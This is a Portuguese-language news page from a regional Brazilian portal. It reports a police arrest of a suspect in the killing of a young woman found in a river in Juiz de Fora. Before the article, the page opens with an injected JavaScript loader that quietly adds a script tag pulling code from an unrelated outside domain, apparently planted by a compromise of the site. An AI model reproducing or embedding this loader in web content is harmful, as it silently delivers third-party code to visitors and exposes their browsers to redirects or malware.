;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Polícia Civil prende suspeito de homicídio em Juiz de Fora. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Polícia Civil prende suspeito de homicídio em Juiz de Fora.

pcA Polícia Civil, por meio do 4º Departamento de Juiz de Fora (4º DEPPC) e da Delegacia Especializada de Homicídios (DEH), apresentou, nesta quarta-feira (20), um homem de 34 anos, suspeito de ter sido o autor do homicídio ocorrido no dia 29 de dezembro do ano passado, quando Janaína Batista, 27 anos, foi encontrada morta, boiando nas águas do Rio Paraibuna.
Conforme o titular da Delegacia Especializada de Homicídios, Dr. Rodrigo Rolli, a ação foi possível por meio de cumprimento de mandado de prisão, representado pela autoridade policial, junto ao Tribunal do Júri. Segundo ele, foram feitas diversas diligências para localizar o suspeito. “No início, só tínhamos uma foto dele no celular de uma amiga da vítima. Depois das campanas em possíveis locais que o suspeito poderia estar, a equipe de policiais civis conseguiu localizá-lo na entrada da obra onde trabalhava como pedreiro, no Bairro Mariano Procópio”, explicou.
Ainda de acordo com o delegado, o depoimento dele foi contraditório. “Segundo os depoimentos, entre familiares e testemunhas, ele era possessivo e ciumento, apesar de ter ficado poucas vezes com a vítima”, contou, complementando que ele tem várias passagens pela Polícia, entre crimes de desacato e contra a mulher. “Estamos ouvindo mulheres que sofreram ameaças de morte por meio de estrangulamento, após relacionamento com o homem”, contou.
O chefe do 4º DEPPC aproveitou o momento para elogiar o trabalho que vem sendo desenvolvido pela DEH em Juiz de Fora e alertar as mulheres quanto aos cuidados a serem tomados ao saírem para se divertir à noite. “ Devem verificar com quem estão se relacionando”, concluiu.

Glaciane Vitorino
Assessoria de Comunicação PCMG
Núcleo Avançado do 4º Departamento de Polícia em Juiz de Fora
Telefone:(32) 3692-5657/ (32)3692-5671/ (31) 9387-0118

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.